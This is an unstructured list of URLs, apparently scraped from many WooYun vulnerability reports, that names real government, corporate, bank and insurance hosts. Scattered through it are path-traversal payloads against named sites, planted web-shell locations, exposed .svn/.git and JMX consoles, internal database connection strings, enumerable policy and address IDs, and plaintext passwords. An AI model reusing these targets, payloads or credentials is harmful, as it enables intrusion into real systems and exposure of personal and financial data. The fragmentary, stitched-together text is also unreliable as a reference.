http://www.517na.com/Message/MessageAdd.aspx http://www.517na.com/Message/MessageReply.aspx?id=88581&url=../Message/MessageList.aspx?isSave=save http://m.zhongjiu.cn/ https://xwremote.jfdaily.com/prx/000/http/localhost/ https://xwremote.jfdaily.com/prx/000/http/192.168.91.235:7001/defaultroot/LogonAction.do https://xwremote.jfdaily.com/prx/000/http/192.168.92.135/ https://xwremote.jfdaily.com/prx/000/http/gpphoto.jfdaily.com:9090/systemBase/login.jsp https://xwremote.jfdaily.com/prx/000/http/jfqmt.jfdaily.com/login/login.aspx?color=Blue https://xwremote.jfdaily.com/prx/000/http/nw.jfdaily.com/mail/ShowDetail.asp?deptid=86 http://target/messager/users.data http://202.108.145.86/ https://159.226.115.194/por/login_psw.csp?rnd=39791234848513584 http://www.taishanpic.com http://www.taishanpic.com/TSHBX/PortalContentInfo.aspx?ContentID=dee75e3b-e2e0-40bc-9de9-da16adf96726 http://wap.jjshome.com/wap/login/getPassword http://www.czhome.com.cn/manage/Login.asp http://dafangtour.com/doc/vote_zj/index.php?cata=122 http://xiage.yy.com https://www.shandianjr.com/ http://www.gxhzgjj.com/upload/admin.php http://119.253.55.28/ui/ http://119.253.55.28/ui/mail/PhoneQuery/PhoneQuery.aspx http://www.jjshome.com http://wap.jjshome.com/wap/login/getPassword http://fangjia.southmoney.com/ https://**.**.**.**/s?wd=inurl%3A%2Fwebs%2Flist%2Fnotice%2F&pn=90&oq=inurl%3A%2Fwebs%2Flist%2Fnotice%2F&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=cd589475000136eb&rsv_t=6536L0edwIYegCm8E7xqTjRKV5t%2FUJCmOEejo5UYpxAoXJlE0OiUhTvOybB4v22%2Feuim http://**.**.**.**/webs/download.action?path=WEB-INF/web.xml http://**.**.**.**/webs/download.action?path=/WEB-INF/classes/applicationContext.xml http://123.125.112.93 http://123.125.115.42/icbcrawl/icp/icpInfo.action http://1.193.7.244:85/ https://vpn.topsec.com.cn http://sendcloud.sohu.com/ http://sendcloud.sohu.com/doc/test/webhook.html http://220.191.210.72/spcf/index.jsp http://58.241.15.17/ http://219.139.130.116:9060/console/ 
http://219.139.130.116:9060/gjjnbs/login.action shell:http://219.139.130.116:9060/jmxroot/jmxroot.jsp jdbc:oracle:thin:@127.0.0.1:1521:gjjnbsdb http://pay.test.51wan.com/.svn/entries http://event21.wanmei.com/shenmo/201108/knight/artical-1.jsp?id=1 ftp://www.ap88.com/ http://xcd.517na.com/login.aspx http://www.qzgaj.gov.cn/qzgaj123/index.asp http://www.qzgaj.gov.cn/jjmail/admin/ http://m.zhongjiu.cn http://210.22.96.81:89/Individual/Content/MyHistoryOrder.aspx http://210.22.96.81:89/TicketDetail.aspx?barCode=000157532229&code=80015WEB01O000157532 http://221.226.149.17:8080/kingdee/cash/tree/get_mail.jsp?node=1 http://221.226.149.17:8080/kingdee/cash/tree/get_flow.jsp?ids=1&flow_name=a http://221.226.149.17:8080/kingdee/cash/tree/get_mail_value.jsp?ids=1 http://221.226.149.17:8080/kingdee/cash/tree/get_flow_class.jsp?file_type=1 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://www.lppz.com http://www.lppz.com/member/profile/update.jhtml http://www.ganji.com/vip/my_message_list.php?source=chatmessage http://static.wooyun.org/wooyun/upload/201504/1511030912d450a7e8775bec6ef6e93fc4dbccdd.png www.tuodong.com:8789 http://218.57.146.178/cwbase/BIAppCenter/BIModel/BIModelDetail.aspx?ID=ff08e987-c1cb-4de8-b48a-5476cee5a0c0&BIVersion=BI6.0&DBType=0%20%20&Version=1.0 http://www.wdmcake.cn/user.php?act=edit_address&id=188475 http://www.wdmcake.cn/user.php?act=edit_address&id=1 http://www.wdmcake.cn/user.php?act=edit_address&id=2 http://www.wdmcake.cn/user.php?act=edit_address&id=3 http://www.wdmcake.cn/user.php?act=edit_address&id=4 http://www.wdmcake.cn/user.php?act=edit_address&id=5 http://www.wdmcake.cn/user.php?act=edit_address&id=6 http://www.wdmcake.cn/user.php?act=edit_address&id=188480 http://jz.eptime.cn/demo/index.asp?action=login 
http://jz.eptime.cn/demo/admin_upfile.asp?path=images/bg/../../../ http://www.eboly.com/info.php http://www.eboly.com/Public/Js/kindeditor-4.1.6/php/file_manager_json.php?dir=file&path=/var/www/phproot/eboly/ http://qz.89898989.com/product/order.html?person=1&productid=127*&visatype= http://www.csrzj.com.cn/news_detail.asp?id=24 http://www.csrzj.com.cn/manager/AdminLogin.asp http://222.247.56.19/manager/admin/login.do http://222.247.56.19/manager/data.jsp http://b2b.zhairport.com/upfile_flash.asp http://b2b.zhairport.com/diy.asp www.jsnt.lss.gov.cn:7901/console www.jsnt.lss.gov.cn:7901/jmxroot/jmxroot.jsp jdbc:oracle:thin:@192.168.200.10:1521/ntweb http://gj.517na.com/Login/Index http://union.tiantian.com/web.php?m=site&a=site_edit&site_id=150 http://union.tiantian.com http://net.lakala.com/index.php http://vip.11185.cn/findpassword.html http://m.gomaji.com/api/ http://yeqi.hit.edu.cn/jys/View.asp?Cid=95 UltraProcess:UniComm_Others/Default+Admin+View/eid=000000000001150&processid=000000000005622&processtype=AUDITING&cacheid=ff882f56 http://www.bbrcb.cn/ http://www.bbrcb.cn:7001/defaultroot/login.jsp http://60.170.41.219:7001/ http://www.aisile.com/reset_user_password http://118.114.245.86:8081/ http://www.yidagroup.com/admin/ http://wooyun.org/bugs/wooyun-2010-0125053出现过的账号演示,15683401303(密码xiaomi123) https://e-services.hccg.gov.tw/jsp/assortBusines.action http://**.**.**/ygz http://**.**.**/admin-console/ http://www.greatlife.cn/dynamic/EleAnnualReport/annualReportManager.jsp?contno=9025000036338788&year=2015 http://www.greatlife.cn/dynamic/EleAnnualReport/annualReportManager.jsp?contno=9025000036338688&year=2015 http://www.greatlife.cn/dynamic/EleAnnualReport/annualReportManager.jsp?contno=9025000036338588&year=2015 www.lanbaoxian.com) http://xiaobeidai.com/)等多个网站,且共用此mysql,此外目标主机为windows服务器,稍加利用可致使整个服务器沦陷并导致多个网站被恶意控制。 http://kd.517na.com/BuyerLogin www.trunkey.com http://demo.trunkey.com/ http://域名/icpadmin.php?module=admin_icp_input&act=upwebsite&IspWzid=3115 
com:88/ www.beianwang.cn www.shceibeian.com www.weidc.net/ www.lwtianchao.com http://**.**.**.**/bugs/wooyun-2015-0129564中多了这样一段URL https://**.**.**.**/s?wd=inurl%3A%2Fwebs%2Flist%2Fnotice%2F&pn=90&oq=inurl%3A%2Fwebs%2Flist%2Fnotice%2F&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=cd589475000136eb&rsv_t=6536L0edwIYegCm8E7xqTjRKV5t%2FUJCmOEejo5UYpxAoXJlE0OiUhTvOybB4v22%2Feuim http://**.**.**.**/webs/list/notice/810.html http://zxta.dg.gov.cn/dgzx/Common/DownloadFile?path=fileName http://marstv.com/?m=video2&c=index&a=ann&id=5 http://online.suning.com/console/ http://www.1890.gov.cn/upload.jsp http://www.1890.gov.cn/upload/1437903440390@1437903440390.jsp jdbc:oracle:thin:@10.169.165.11:1521:YSFZ www.ganji.com http://www.10jqka.com.cn/includes/includes.tar.gz http://pass.10jqka.com.cn/crossdomain.xml http://pass.10jqka.com.cn/logout?redir=http%3A%2F%2Fwww.baidu.com%2F%3F1437917800.89 http://fund.10jqka.com.cn/zixuan/.svn/entries https://mail.youku.com http://mail.ymt360.com/ http://wechat.youku.com/pay/checkpay/order_id/450* http://luban.baidu.com/index.php?r=other/viewCityVersionMap http://luban.baidu.com/luban/index.php?r=statistics http://luban.baidu.com/luban/index.php?r=statistics/jiesuan http://luban.baidu.com/luban/index.php?r=dataExport/ExportData http://luban.baidu.com/index.php?r=other/ViewCityVersionMapCreate&citycode=168-3 http://luban.baidu.com/index.php?r=other/ViewCityVersionMapByCitycode&citycode=168-2 http://m.changtu.com/user/findPwd.htm http://old.p2p222.com/index.php/ http://old.p2p222.com/index.php/OldData/investment/uid/6466.html http://old.p2p222.com/index.php/OldData/trading/uid/6665.html http://**.**.**.**/about.aspx?cid=aboutus http://**.**.**.**/about.aspx?cid=aboutus http://**.**.**.**/news_details.aspx?ID=403&PID=84 http://**.**.**.**/about.aspx?cid=question http://**.**.**.**/solutionview.aspx?id=132 http://**.**.**.**/about.aspx?cid=gywm http://**.**.**.**/products.aspx?parid=58 http://**.**.**.**/case.htm?page=1 
https://account.shfft.com/member/pwd/find passport.m.dangdang.com/login.php?burl=看到触屏版没有https加密协议,也没有验证码的限制 http://union.dangdang.com/user/user/login这个接口,是当当网一个分站的网站登录地址,可以看到登录的地址没有验证码限制 http://xuexiao.ciwong.com/ http://research.ciwong.com/ http://wooyun.org/bugs/wooyun-2015-0119941故此一试,返现春趣商场的订单完成没有做建议或者签名,可以任意修改价格完成支付,再忽悠下客服妹子就可以发货了。 http://weiluyi.m.ciwong.com https://github.com/search?utf8=%E2%9C%93&q=user%3AjackShan+PeccancyInfo&type=Code&ref=searchresults http://183.63.133.158:8081 http://183.63.133.158:8081/Resource/SysUser/query http://pay.lianzhong.com http://60.190.2.183/standard/reg/nosecuritycheck/createUserInit.xhtml?standardType= http://www.sdkjrz.cn/ http://183.62.99.137:81/Web1800/Service/AutoLogin.aspx?GpId=&ClientType=iscompact&Version=&id=8080152&bgColor=&ud= http://www.tp-linkshop.com.cn/account/resetpassword http://www.tp-linkshop.com.cn:80/Account/SetPassword?type=1&id=【邮箱】&key=【key】 http://www.tp-linkshop.com.cn/Account/SetPassword?type=2&key=【key】&id=【手机】 http://www.tp-linkshop.com.cn/Account/ResetPassword https://appstore.crc.com.cn/appstore/toIpadIndex.do集团移动应用商城 http://**.**.**/wljkpt/login2.aspx http://stream-auth.bbn.com.cn/user/account/ http://stream-auth.bbn.com.cn/common/sqlPlus.jsp inurl:http://www.moootooo.com/app/motor.php?userid= http://www.moootooo.com/app/motor.php?userid=MjQ5NzI=&up_id=MTAwMDI0NzUyNA== http://www.moootooo.com/app/motor.php?userid=NDA2Mjgw&up_id=MTAwMDEzMTg0MA== http://cuc.asiainfo.com/office/optorLogin_toLogin.so http://202.96.124.89:8080/webclient/jsp/login.jspj http://wskh.avicsec.com/m1/login.do http://sj.avicsec.com/m1/login.do http://**.**.**.**/opac/virtual_shelf_lst.php?CLASS_ID=1 http://**.**.**.**/opac/virtual_shelf_lst.php?CLASS_ID=1 http://223.87.19.66:12001/jmad/ http://**.**.**.**/bugs/wooyun-2015-0127780/trace/142fc61301f128c2603b870c014624fa http://**.**.**.**/bugs/wooyun-2015-0128179/trace/e7be2fc128208c912fca0aaf1c0ed8fa 
http://**.**.**.**/bugs/wooyun-2015-0128674/trace/1d19a9f159b538c3ff50761e9af51b74 http://**.**.**.**/bugs/wooyun-2015-0128961/trace/a57d076a904299648b443214bed5ab62 http://**.**.**.**/bugs/wooyun-2015-0129150/trace/b356566d799cc67db52e78efe713da60 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=1019&subjectid=12399 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=1035&subjectid=12666 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=984&subjectid=10409 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=979&subjectid=7127 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=976&subjectid=8453 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=915&subjectid=10088 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=944&subjectid=10089 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=969&subjectid=10985 http://**.**.**.**/ylnews/video/videoView.jsp?videoid=3847 http://**.**.**.**/main/video/videoView.jsp?videoid=194 http://**.**.**.**/main/video/videoView.jsp?videoid=378 http://**.**.**.**/main/video/videoView.jsp?videoid=731 http://**.**.**.**/main/video/videoView.jsp?videoid=253 http://15th.300.cn/ce_15th_admin/story?search_button=%e6%90%9c%e7%b4%a2&search_company=1&search_date=01/01/1967&search_name=csomfbsy&search_type=1 http://123.125.XXX.103/menu.jsp http://123.125.XXX.103/reception http://123.125.XXX.103/register.jsp http://123.125.XXX.103/system/index.jsp http://123.125.XXX.103/menu.jsp http://123.125.XXX.103/reception http://123.125.XXX.103/register.jsp http://cms.baofenggame.com:7070/login.bf http://223.87.19.65:10005/cam http://182.140.142.160:8080/login http://www.k76.com/Help/index.html找到小编的QQ2233799326 http://119.191.61.214:9080/ksbm/checkjx.do?xzqh=370700 http://119.191.61.214:9080/wscgs/xwl.do?smid=22&bgid=04&bj=8参数smid和bgid均可注入 www.91student.com http://**.**.**.**/bugs/wooyun-2014-066332 http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ 
http://**.**.**/_ http://37t.ranknowcn.com/web_q_js/web_js_ajax/lesson.ajax.php?courseType=101 http://www.118114.cq.cn/ www.118114.cq.cn http://ec.vcooline.com/admin/site/wx_settings http://ec.vcooline.com/admin/products/new?micro_shop_category_id=70 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037310_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037311_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037312_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037313_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037314_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037315_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037316_1 http://221.226.149.17:8080/kingdee/cash/tree/get_nodes.jsp?node=1 http://221.226.149.17:8080/kingdee/cash/tree/get_part.jsp?ids=1 http://221.226.149.17:8080/kingdee/cash/tree/get_selected.jsp?ids=1 http://221.226.149.17:8080/kingdee/cash/tree/get_netcom_lower_selected.jsp?ids=1 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://www.longlongweb.com/Resetpass/resetpass.shtml http://open.17wo.cn:8080/open17wo/ 
http://open.17wo.cn:8080/open17wo/manage/messageManagerloadMessage.action?id=96 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004811&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004813&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004814&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004815&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004816&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://203.156.212.202:8080/ http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000010 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000013 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000014 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000015 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000016 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000017 http://api.m.uuzu.com/?account=e&c=api&device=android&event=recharge&game_id=93&m=select https://github.com/NoahShen/mycodefactory/blob/6a72c7f03be388c77c6fa10fa49b43c89c200d3d/dp-gitlab/src/dpgitlab/dpgitlab.go http://www.plgjj.com/webquery_login.asp http://js.crland.com.cn:80/project.aspx?pid=20&id=24&cpath=2&mid=4-0 ID:301865)密码110120 ID:100000) http://www.dai36.com/ https://mail.qq.com/ http://www.cqspbfy.gov.cn/ http://www.cqspbfy.gov.cn/webmis/login.asp 
http://211.162.209.186/files/4137000001CECF25/www.cqspbfy.gov.cn/web.rar http://www.xaks.com.cn:80/search.aspx http://www.xaks.com.cn/webCenter/ http://www.xaks.com.cn:80/search.aspx http://www.xaks.com.cn http://sqlmap.org http://www.fastontime.com/cgi-bin/ginfo.dll?WebPic&order=&w=fastontime* http://ask.huatu.com/question/questionbrowse.php?question_id=97224 http://www.chinaunicomsi.cn/cnc/cncsi.asp?id=%5c http://mail.hnedu.cn:8080/gw/admin/ http://new.citsbj.com http://new.citsbj.com/Personal/ContactDetail/XX(后面是id) http://new.citsbj.com ip:115.182.85.224 http://fotoplace.cc/api2/discover/discover_near_watermarks.php http://IP:7777/command?callback=xyz&...的形式本地或者远程获取手机的敏感信息、或者执行命令。 http://IP:7777/geo***?callback=xyz http://developer.baidu.com/wiki/index.php?title=docs/frontia tps://www.secoopay.com/invoker/JMXInvokerServlet system:type=ServerInf https://www.guangxindai.com/third/email_auth/82185/a9f1dfea8b13c08514c3c480759589e6/9ed279008f0c21ac7621dc1475075b6d/1438052747/71e09b16e21f7b6919bbfc43f6a5b2f0 https://www.guangxindai.com/third/email_auth/1/a9f1dfea8b13c08514c3c480759589e6/9ed279008f0c21ac7621dc1475075b6d/1438052747/71e09b16e21f7b6919bbfc43f6a5b2f0 http://www.wifiap.cn/ SSH:175.30.66.45 https://url/entsoft/LoginAction.entphone?leftFlag=true&method=logon&usrNam=admin&usrPswd=admin http://www.inins.com/Policy/Insure/InputPolicy/10000-241?update=true http://www.inins.com/Policy/Insure/InputPolicy/130000-241?update=true http://passport.ifreetalk.com/index.php?m=reset_pass&id=18197&u=ae6cabef0bc188dcbdd3754fd83a49be&e=def5ebc3d93bf178419778c23d6f2352 http://**.**.**.**//admin/Main.aspx http://**.**.**.**/admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://bx.doyouhike.net/?act=show&pid=566715 http://bx.doyouhike.net/?act=show&pid=217825&key=89F47063AD4A http://www.ctmcc.cn/htworld/Login.asp 
http://realauto.testin.cn/ http://116.255.252.25:100 http://203.130.41.96/html/setting.html http://shop.vivo.com.cn/gallery-ajax_get_goods.html http://www.wy-fund.com/index.php?a=init&c=inbrok&inst_id=56&m=instarea http://www.wy-fund.com/index.php?c=infund&inst_code=80091787&m=instarea http://www.wy-fund.com/index.php?c=infund&inst_code=80091787&m=instarea http://sqlmap.org www.bdc.org.cn/common/download.do?path= http://www.999.com.cn/downpdffile.aspx?file=/../../web.config http://mgm.h-world.com/MGM/ForgetPassword http://plus.zealer.com/), http://www.zealer.com/user?type=info)(http://plus.zealer.com/user)的各项敏感操作均无防御CSRF(如增加token或验证referer)。 www.51suizhen.com http://pic0.aituan.com/public/images/at/act/.svn/entries svn://dev.aituan.com/aituan.com/public/images/at/act svn://dev.aituan.com/aituan.com svn://dev.aituan.com/aituan.com并且存在wangyupeng用户。 www.uunn.cn http://www.crcgas.net:80/exam/listScore.asp?id1=826&id2=827&id3=828&id5=830&nubb=5&tijiao=ok&id4=829-0 http://www.doyouhike.net:80/ www.doyouhike.net http://www.doyouhike.net:80/ www.doyouhike.net http://kjc.cuit.edu.cn/xxgcxy/ http://www.juran.cn/member/login.htm http://www.zteclouds.cn,中兴云服务: http://www.ttkdex.ca/control/taxRebateHandler.ashx post:customerNumber=1&Method=checkCNumber http://www.ttkdex.com.hk/control/taxRebateHandler.ashx post:customerNumber=1&Method=checkCNumber http://www.ttkexpress.us/control/taxRebateHandler.ashx post:customerNumber=1&Method=checkCNumber http://222.76.243.13:90/zhiji.asp http://222.76.243.13:90/System/FCKeditor/editor/fckeditor.html http://mail.ymt360.com/ http://m.elong.com/my/account/addresslist/ http://www.jxgb.gov.cn/searchqk.asp http://www.jxgb.gov.cn/login.asp http://www.doyouhike.net:80/ www.doyouhike.net http://www.doyouhike.net:80/ www.doyouhike.net http://gplm.zhxg.com/api/excel.php?path=../../../../../../../../../../etc/passwd http://app4.vpclub.cn http://app.vpclub.cn/ http://dev.vpclub.cn:84/ http://120.24.218.210:8081/ http://211.99.198.14/ 
http://test.admin.f.sdo.com/ http://m.zc.suning.com/order/toBuy.htm?redoundId=5108&projectId=1428 www.edaixi.com http://119.29.44.145/ http://www.tootoojia.com/userAddress/AddAddress.htm?CityId=2&UserId=100001&DetailedAddress=wooyuntest&ProvinceId=1&DistrictId=10&RealName=%E5%93%88%E5%93%88&PhoneNumber=13888888888&Postcode=100000 http://www.tootoojia.com/userAddress/ShowAddressList.htm?UserId=104853 www.tootoojia.com/notice/noticeList.htm?Page=1&PageSize=20&UserId= www.tootoojia.com/mail/GetMailUserList.htm?Page=1&PageSize=20&UserId= www.tootoojia.com/friend/AddFriend.htm?FollowId=参数1&UserId=参数2 http://www.tootoojia.com/Contact/ShowContactList?UserId=100000 URL:http://www.chnkid.com/wxfw/toupiao/perinfo_show.php?id=8561&share=1&from=groupmessage&isappinstalled=0 http://www.sdwscgs.com:9080/zdwz/xwl.do?smid=02&bgid=01&bj=10参数smid和bgid均可注入 http://oa.haotel.com/index.htm http://jsgz.cn/eg.htm http://mofang.hunantv.com/ me:7002(与费控系统为统一访问地址) smb://samba.dev.elenet.me/ http://z.elenet.me/zap.pac http://z.elenet.me/zapsocks.pac http://zz.elenet.me http://zz.elenet.me/ofsocks.pac https://passport.coolyun.com/forget/ http://rd.haierpeople.cn/Home/Main http://mmsynut.shengyuan.com/crmselfservicedemo/printglbill.asp?mid=167983 http://60.13.180.2:7001/wscxhami/zfbzgl/zfbzsq/login_hidden.jsp?password=111111&sfzh=11111111&cxyd=%B5%B1%C7%B0%C4%EA%B6%C8 www.fjmotor.com.cn/tBook/magazine.asp?mCode=20150105104750086 www.xl-group.com.cn/tBook/Magazine.asp?mCode=20130109121105875 http://www.hengyugroup.com.cn/tbook/Magazine.asp?mCode=20121217173403886 www.jianzhou.cn/tBook/Magazine.asp?mCode=20150413150438653 hy.txwl.cn/tBook/magazine.asp?mCode=20140325141903118 www.zhongliangroup.cn/TBook/Magazine.asp?mCode=2014_274 zgwy.txwl.cn/tbook/Magazine.asp?mCode=2012062085408653 http://pay.360kxr.com/PromptOrder/OrderPay?orderid=1210507 http://pay.360kxr.com/PromptOrder/OrderPay?orderid=1212971 http://www.968309.com/news.php?act=list&cat_id=36 http://browser-admin.server.nubia.cn 
http://eb.e-bridge.com.cn/newebridge/default.jsp http://123.125.116.75:80 http://www.800best.com/manage/asp/temp.asp获取shell。 http://lianjie.crland.com.hk/Webs/HR/news.aspx?hr=69 http://lianjie.cr land.com.hk/Webs/HR/news.aspx http://sqlmap.org http://lianjie.crland.com.hk:80/Webs/HR/index.aspx http://sso.testin.cn/ucenter.action?op=Password.retakePwd http://182.139.134.85:6001/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://wooyun.org/bugs/wooyun-2015-0129261 http://www.chinartc.com:80/dev/homeinfoman/getOneNewsInfo.do?newsId=20150603135533616 http://zx.caakee.com/servlet/download?fileName=caakee_importAccount.xls zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts http://112.65.166.115/messager/users.data http://**.**.**.**/ggj/news/listNews.jsp?channel=null&artColumn=03020205&startRow=1220&rowNum=10 http://**.**.**.**/news/listNews.jsp?channel=null&artColumn=03020105&rowNum=15 http://**.**.**.**/hsgs/news/listNews.jsp?channel=1&artColumn=03020101 http://**.**.**.**/news/listNews.jsp?channel=5&artColumn=030207 http://**.**.**.**/opac/book_evaluation.jsp?kzh=zyk0044456&flh=H310.421/6&fs=1 http://**.**.**.**:8089/opac/book_evaluation.jsp?kzh=zyk0067864&flh=I565.64/4&fs=1 http://**.**.**.**:8089/opac/book_evaluation.jsp?kzh=zyk0021839&flh=A1/1-1&fs=1 http://**.**.**.**:8090/opac/book_evaluation.jsp?kzh=zyk0005042&flh=A71/3&fs=1 http://**.**.**.**:8000/opac/book_evaluation.jsp?kzh=zyk0000001&flh=F744/12&fs=1 http://219.143.192.32/ http://bbs.duowan.com/ http://sso.sys.kuxun.cn/.git/config http://www.tczfgjj.gov.cn/contact.aspx?sortId=30 http://www.imxiaomai.com/Join/index/id/20.html http://www.homsom.com/information/Info_ModifyAddress.aspx?Aid=3662 http://www.homsom.com/information/Info_ModifyName.aspx?cfid=12666 http://61.156.217.133:2011/index.htm user:cccc pwd:111111 http://61.156.217.133:2011/goform/webDown/?name=user_obj.txt&path=/etc/passwd http://shop.100msh.com http://www.hbstars.com/Default.shtml 
http://www.hbstars.com/news/visitread.aspx?ID=12001504150000 http://city.vivo.com.cn/mb/CheckAll.aspx?actiontype=1&pageindex=2&t=0.7262028979603201&typeid=468 http://city.vivo.com.cn/pc/CheckAll.aspx?actiontype=1&pageindex=2&t=0.4454611742403358 http://city.vivo.com.cn/mb/CheckAll.aspx?actiontype=MoreUpload&t=0.7064304086379707 http://headpic.u.qiniudn.com/13邮9511箱022@qq.com?e=1438588987&token=OOHK9_MIwdSJxAHYi5os2taDVS13CVvcEa1cZDb9:8SAF5GENL6scaR2R43YfUKhLR8w= http://www.lrts.me/delComment.do?commentId=4442620 http://101.231.65.81/ http://180.166.180.81/ http://221.226.149.17:8080/kingdee/control/netcom_out_del.jsp?del_id=1,1* http://222.133.44.10:8080/kingdee/control/netcom_out_rfile_submit.jsp?netcom_id=1&index_id=1 http://222.133.44.10:8080/kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1 http://221.226.149.17:8080/kingdee/control/netcom_out_rfile_lower_submit.jsp?index_id=1&action=1111 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://218.27.137.242:8080 http://222.177.213.190:8888 http://117.132.15.88:8001 http://221.224.116.210:81 http://221.238.243.237:8000 http://222.177.213.190:8888/Server/CmxcheckBind.php?b=2&a=1%cc http://203.192.12.219/Default.aspx http://211.138.77.214/ http://211.138.77.214/XWZX/XWZXDetail.aspx?PKID=1935 http://member-center.pywm.com.cn/ http://113.98.59.170 http://221.6.35.202:8193/ 
http://221.6.35.202:8193/is/index.jsp http://server2.cdce.cn/WebEims/ http://123.233.240.70:9080/ksbm/checkjx.do?xzqh=370125 http://123.233.240.70:9080/ksbm/checkjx.do?type=bm&code=3701036 http://223.99.198.194:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://218.56.165.82/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://222.134.129.34:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://222.134.200.57:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://60.213.185.51:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://60.211.179.22:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://123.130.246.26:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://cgs.ytjj.gov.cn:9061/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://123.131.131.94:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://218.59.228.162:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://cgs.qdpolice.gov.cn:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://58.59.39.43:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://www.njds.gov.cn/cgi-bin/test-cgi http://www.heinz.com.cn/ http://www.doyouhike.net/user/1/photos?set_id=78834&set_name=5M http://www.doyouhike.net/user/1/photos?set_id=78834&set_name=5M http://www.ahljj.gov.cn/e:/ http://easyxiu.zol.com.cn/H/repair_ajax.php?point=u&noid=1&mark=296&txt=%E8%8B%B9%E6%9E%9C&lei=%E5%B9%B3%E6%9D%BF%E7%94%B5%E8%84%91&fin=false&num=1 http://imccc2012.hit.edu.cn/main.jsp http://imccc2012.hit.edu.cn/login.jsp index.php/admin/ http://ices.hit.edu.cn:8080/ http://ices.hit.edu.cn:8080/test3693/ http://ices.hit.edu.cn:8080/manager/html http://findpwd.veigou.com/ http://media.open.com.cn/media_file002/1109/dongshi/guojif/anli.asp?id=160 http://passport2.chaoxing.com/admin 